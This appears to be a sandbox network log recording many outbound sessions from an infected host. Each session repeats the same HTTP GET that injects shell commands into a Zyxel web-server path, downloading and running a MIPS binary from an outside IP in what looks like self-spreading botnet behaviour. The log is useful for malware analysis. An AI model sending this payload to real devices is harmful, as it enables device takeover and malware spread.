                                    Jan 13, 2024 19:02:23.934154034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2011192.168.2.134321486.206.241.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.934173107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2012192.168.2.134251420.59.242.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.934218884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2013192.168.2.134845476.166.46.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.950977087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2014192.168.2.1352626207.16.29.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.950982094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2015192.168.2.1360932110.213.162.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951044083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2016192.168.2.134006847.60.3.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951065063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2017192.168.2.134017651.131.52.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951092005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2018192.168.2.1337306129.250.174.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951141119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2019192.168.2.1337174177.95.60.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951176882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2020192.168.2.1356710194.193.205.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951195955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2021192.168.2.135081269.139.177.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951251984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2022192.168.2.1353634163.86.7.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951282978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2023192.168.2.135721872.148.2.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951323986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2024192.168.2.1354666119.158.157.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951370001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2025192.168.2.1355164162.78.62.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951390028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2026192.168.2.133615865.169.220.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951445103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2027192.168.2.136079279.107.88.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951478004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2028192.168.2.1338248195.249.176.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951497078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2029192.168.2.1347440165.238.164.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951523066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2030192.168.2.1336678125.165.193.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951571941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2031192.168.2.13552649.217.19.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951606989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2032192.168.2.1341200209.252.104.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951651096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2033192.168.2.133462460.205.175.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951689005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2034192.168.2.1358578109.6.164.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951735973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2035192.168.2.135281452.218.197.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951766968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2036192.168.2.135390053.191.146.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951806068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2037192.168.2.135744657.119.213.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951852083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2038192.168.2.1359158191.224.94.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951898098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2039192.168.2.134664625.67.101.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951931953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2040192.168.2.1351200210.223.229.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.951989889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2041192.168.2.1345346186.35.102.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952003002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2042192.168.2.135258234.123.184.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952025890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2043192.168.2.1358620148.229.162.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952080965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2044192.168.2.1336560203.80.153.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952102900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2045192.168.2.1346852106.92.98.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952152967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2046192.168.2.1334148216.251.71.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952194929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2047192.168.2.135914096.89.108.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952210903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2048192.168.2.1335546140.13.35.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952238083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2049192.168.2.135693434.140.146.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952258110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2050192.168.2.1355556137.93.100.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952284098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2051192.168.2.1352942109.213.235.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952326059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2052192.168.2.134762282.30.68.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952353954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2053192.168.2.1341828114.15.247.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952398062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2054192.168.2.1333630182.42.3.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952433109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2055192.168.2.1343162135.8.100.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952467918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2056192.168.2.1352112211.15.223.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952505112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2057192.168.2.1336396138.19.72.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952532053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2058192.168.2.1347940160.120.8.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952586889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2059192.168.2.134311289.52.4.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952610970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2060192.168.2.1336860132.181.91.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952649117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2061192.168.2.1358856149.192.19.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952680111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2062192.168.2.1347518210.115.2.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952716112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2063192.168.2.135803850.63.96.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952756882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2064192.168.2.1335246203.63.211.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952790022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2065192.168.2.133675476.88.187.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952828884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2066192.168.2.134925274.188.106.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952856064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2067192.168.2.1350850207.159.47.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952883005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2068192.168.2.1334616140.80.134.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952928066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2069192.168.2.135857044.42.221.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952970982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2070192.168.2.1358956220.175.45.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.952997923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2071192.168.2.1347578122.1.13.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953046083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2072192.168.2.133749689.92.177.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.953080893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2073192.168.2.134799050.160.121.180443
                                    TimestampBytes transferredDirectionData
